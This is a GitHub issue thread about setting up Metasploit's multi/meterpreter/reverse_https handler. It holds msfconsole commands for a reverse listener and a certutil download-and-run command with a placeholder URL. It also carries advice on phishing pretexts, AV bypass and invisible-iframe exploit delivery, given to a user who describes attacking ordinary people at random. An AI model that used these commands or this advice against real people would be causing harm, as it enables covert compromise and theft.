### ISSUE TITLE
No sessions created when setting up multi/meterpreter/reverse_https

### ISSUE THREAD

**Issue by digilevi2006** [rapid7/metasploit-framework#13786]
Hello Everyone,

This is a question regarding the utility of the module multi/meterpreter/reverse_https

Hi @OJ 

I was the one who was asking here.
https://github.com/rapid7/metasploit-framework/pull/7634#issue-95829641

So,
I thought this part was the payload=>
_set payload multi/meterpreter/reverse_https_

so, I still need to set the specific payload for the target arch in mind? So if I want to target only windows, I would set 
_set payload windows/meterpreter/reverse_https_

If that is the case, I am now confused as to what the word "multi" means and I think I've read in other thread that the script will automatically get the UUID of the target hence no need to specify payload? 
I'm not sure if I'm making sense and if I understand what I'm doing. Please pardon me.

So, if I did these steps, 

```
msf > use multi/handler
msf exploit(handler) > set payload multi/meterpreter/reverse_https
payload => multi/meterpreter/reverse_https
msf exploit(handler) > set LHOST xx.x.xx.xx
LHOST => xx.x.xx.xx
msf exploit(handler) > set LPORT 7777
LPORT => 7777
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] [2016.11.30-14:21:18] Started HTTPS reverse handler on https://xx.x.xx.xx:7777
[*] [2016.11.30-14:21:18] Starting the payload handler...
msf exploit(handler) > jobs -v
```

and say my ip/LHOST is 192.168.1.35:7777

I tried accessing https://192.168.1.35:7777 from other computer but I just see the "It works" but no sessions created on Kali

Please explain to me a little further how to properly setup and utilize this. I can't seem to figure it out.

Thanks

**Comment by OJ** [comment]
The listener is intended to handle/accept Meterpreter sessions. That means you have to run an instance of the Meterpreter agent that has been configured to point to that listener. If you haven't created a Meterpreter payload with the right parameters and then invoked it on a target box, you won't be able to do anything.

**Comment by bcoles** [comment]
> I am now confused as to what the word "multi" means

`exploit/multi/handler` is a generic module for handling sessions/payloads. It is `multi` because it can handle sessions for any arch or platform.

The handler must be configured with the correct `payload` associated with the payload used on the target system. For example, for staged payloads, the handler must know which stage to send to the target system.

**Comment by digilevi2006** [comment]
Hi @bcoles and @OJ 

Thank you for your help

@bcoles , I meant the "multi" from the name of "multi/meterpreter/reverse_https"

Anyway, so in other words, I need to set payload for all archs of probable targets that will access my url?

So, let's say if I will do this:

```
msf > use multi/handler
msf exploit(handler) > set payload multi/meterpreter/reverse_https
payload => multi/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.35
LHOST => 192.168.1.35
msf exploit(handler) > set LPORT 7777
LPORT => 7777
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] [2016.11.30-14:21:18] Started HTTPS reverse handler on https://192.168.1.35:7777
[*] [2016.11.30-14:21:18] Starting the payload handler...
msf exploit(handler) > jobs -v
```

Then, I will access the https://192.168.1.35:7777 from a windows 10 computer, no session will be created? unless i specifically do 

_"set payload windows/meterpreter/reverse_https"_

So, what is this step for then:
_"set payload multi/meterpreter/reverse_https"_


Sorry, I'm confused :)

**Comment by OJ** [comment]
> Then, I will access the https://192.168.1.35:7777 from a windows 10 computer,

No, you need to run an instance of the Meterpreter agent configured to reference your listener. As I said, this is done by creating an instance of the agent by generating a payload (using `msfvenom` for example) and then invoking that on the target.

**Comment by digilevi2006** [comment]
So, you mean, there is still a need to run an exe or PS1 file on the target machine? and with full interaction from the victim? 

If so, is there any way that this will not have to require target to invoke/run something on the target machine? Kinda like the beEf-xss hook style but on a staged meterpreter? --quietly?

Thanks in advanced.

**Comment by OJ** [comment]
Yes, I mean that you need to run the agent. You need to have it invoked. You can do this through a number of means:
* Social engineering for payload execution
* psexec.
* Exploitation of a vulnerability.
* Manual invocation after you've gained access through other means.

And no, it's not possible to run Meterpreter from a browser. Beef is very different.

**Comment by digilevi2006** [comment]
> And no, it's not possible to run Meterpreter from a browser.

Oh, I didn't mean like that. pardon my english. I just meant the way of hooking("automatic backdoring"). I've seen some demonstration of other reverse meterpreter shells and the nearest thing to what I wanted to achieve is by setting up an html/php file with an injected javascript payload(not sure if that's what I understood with that article). So, hook the browser(beEf) and generate a meterpreter shell at the same time. 

I know I can use the metasploit within beEf and tried it before but it's a bit hard to find the proper persistence exploit applicable to a hooked target. An automatic persistence by automatic assessment of the hooked browser/target-arch would be awesome. Maybe it's too ambitious but a newbie like me might not be able to select the proper payload for a hooked target for example.

Anyway, the topic has gone awry so, thank you to both of you for the enlightenment. Kindly close this topic.

Cheers.

**Comment by OJ** [comment]
Sorry, I misunderstood your point. That's most likely my fault not yours.

There are various ways you can persist payloads on a Windows machine. You will have to utilise one of those or come up with your own. Either way, the "payload" for Meterpreter isn't a blob of JavaScript like BEEF's is. To get execution through a browser, you need an RCE exploit, and that's obviously browser-specific.

Establishing a backdoor/persistent mechanism for Meterpreter via BEEF would not be possible, based on my understanding. But given that @bcoles knows a thing or two about BEEF he's probably the better person to speak to about that.

**Comment by digilevi2006** [comment]
Oh, thank you @OJ .

will look into some articles regarding RCE then. 

And I don't even know how to contact/DM a person here in Github 😆 

Anyway, thanks to both of you. 👍

**Comment by bcoles** [comment]
> And I don't even know how to contact/DM a person here in Github

GitHub removing their messaging service about a decade ago.

> So, hook the browser(beEf) and generate a meterpreter shell at the same time.

BeEF offers a command and control channel to send arbitrary JavaScript for execution in the hooked browser (and also retrieve data from the browser).

To achieve code execution outside of the browser sandbox you can use your browser 0day. If you don't have a browser 0day, you can try convincing the user to download and run an executable payload native to the target system. BeEF has a bunch of modules for this purpose. The most popular module is the HTA module (for Windows targets). An article was recently published which may be of interest to you:

* https://medium.com/@bluedenkare/1-click-meterpreter-exploit-chain-with-beef-and-av-amsi-bypass-96b0eb61f1b6

If your goal is code execution, then BeEF isn't necessary, but sometimes its nice to have.

**Comment by digilevi2006** [comment]
Hi @bcoles 

Wow! an article published 4 days ago? no wonder, hasn't been crawled :)

Anyway, I went through to the article fast and I've seen a disassembly part and might not be my thing.

I also saw that there is an interaction of the victim to the page, and I would always assume(not sure if it's just me) for people, even the non-geekiest person, to be suspicious about file execution and would not dare to click or run it. Unless if it requires them before they can the web page of course. 

beEF hooking is very quiet but it doesn't penetrate to the system level(correct me if I'm wrong), spawning a shell, upload files, etc. 

But I will still read this article and would read closely if I will see anything that I could use of.

Thanks @bcoles 

By the way, I always like the idea to have beEF in place for social engineering purposes... 👍

**Comment by okoibraun** [comment]
Hello @digilevi2006,

Have you tried generating a payload for the target machine and using
certutil on in windows to download and run the file on windows since
windows is the target machine?

here is an example of how you can use certutil to download and run the
payload somewhat undetected e.g.: certutil -urlcache -split -f [payloadURL]
[output-filename.ext]

you can always read more on penetration testing using certutil and by also
typing certutil help

**Comment by bcoles** [comment]
> Anyway, I went through to the article fast and I've seen a disassembly part and might not be my thing.

The disassembly is for AV bypass. Required only should you wish to bypass AV.

> and I would always assume(not sure if it's just me) for people, even the non-geekiest person, to be suspicious about file execution

Your assumption is undermined with a suitable pretext. See:

* https://en.wikipedia.org/wiki/Social_engineering_(security)#Pretexting

Delivery of client-side attacks via non-executable malicious files is also viable. See:

* https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/fileformat
* https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/unix/fileformat
* https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/multi/fileformat

> By the way, I always like the idea to have beEF in place for social engineering purposes...

You may enjoy the [Social Engineering](https://github.com/beefproject/beef/tree/master/modules/social_engineering) modules, including the [Pretty Theft](https://github.com/beefproject/beef/tree/master/modules/social_engineering/pretty_theft) module.

* https://github.com/beefproject/beef/tree/master/modules/social_engineering/pretty_theft
* https://github.com/beefproject/beef/wiki/Module:-Pretty-Theft  (old documentation)

> beEF hooking is very quiet but it doesn't penetrate to the system level(correct me if I'm wrong), spawning a shell, upload files, etc.

If you can do it in JavaScript, you can do it with BeEF. That includes phishing and delivery of browser exploits. You can easily start a browser exploit with Metasploit then use BeEF to embed an invisible iframe pointing to the exploit page on the Metasploit web server.

Similarly, BeEF also supports rudimentary integration with Metsploit's Browser Autopwn, but that's little more than a novelty these days. See #13735.

While the security boundaries between the browser and host operating system and local network has some holes, generally if you want code execution on the host you're going to have to exploit a browser vulnerability or convince the user to breach the boundary for you.

**Comment by digilevi2006** [comment]
> Your assumption is undermined with a suitable pretext. See:

Yes, this is true. But what if the plan is an attack for mostly common case scenarios which might be applicable to the common people without specific "audience"/victim in mind. So the attacker would just setup a scenario which has not been done before, example: Why are dogs considered men's best friend? Story of a dog and his Person, click HERE... not sure but almost all engineering scenarios are about bank account has been locked up or some sort...It's like a common attack scenario, applicable to all sorts of targets, big or small, corporate or individual.

But these links, hell yeah!
 definitely a good read for me... bookmarked!

> Delivery of client-side attacks via non-executable malicious files is also viable. See:
> 
> * https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/windows/fileformat
> * https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/unix/fileformat
> * https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/multi/fileformat



> to embed an invisible iframe pointing to the exploit page on the Metasploit web server.

I've read this one before, I don't remember why I dropped it... I think I'll need to find that article again. I hope I bookmarked it.

Thank you very much, @bcoles ... These will keep me busy for a while. Cheers! :)
